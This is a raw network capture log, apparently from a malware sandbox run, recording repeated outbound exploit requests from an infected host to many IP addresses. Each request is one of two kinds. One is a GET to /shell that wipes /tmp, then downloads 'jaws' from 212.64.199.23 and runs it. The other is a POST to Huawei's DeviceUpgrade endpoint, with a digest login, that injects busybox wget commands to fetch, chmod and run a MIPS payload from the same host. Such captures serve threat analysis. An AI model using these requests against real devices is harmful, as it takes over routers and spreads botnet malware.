                                                          Feb 4, 2025 18:11:19.488451004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          84192.168.2.1543058125.144.55.23680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.489978075 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          85192.168.2.1558146161.215.111.3780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.491246939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          86192.168.2.1543710155.48.55.4180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.492624044 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          87192.168.2.1547682222.146.115.15380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.493695021 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          88192.168.2.1559318162.28.10.14880
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.494976997 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          89192.168.2.154979274.137.199.23180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.496097088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          90192.168.2.155081641.137.88.11837215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.543718100 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          91192.168.2.1547526204.176.132.11080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.543919086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          92192.168.2.153724884.0.101.24480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.575746059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          93192.168.2.155817241.106.217.5537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.575903893 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          94192.168.2.1533738156.129.236.10037215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.607692003 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          95192.168.2.1533010207.26.197.3680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.639689922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          96192.168.2.154373241.238.27.18537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.671685934 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          97192.168.2.1536766143.23.249.3880
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.671859980 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          98192.168.2.155346841.90.199.4137215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.703608036 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          99192.168.2.155893641.130.45.5537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.705212116 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          100192.168.2.1539476197.75.231.24837215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.706924915 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          101192.168.2.1556738156.106.230.15037215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.735578060 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          102192.168.2.154502232.71.11.10180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.735785961 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          103192.168.2.155089842.77.12.9580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.767608881 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          104192.168.2.155362617.53.64.20780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.799645901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
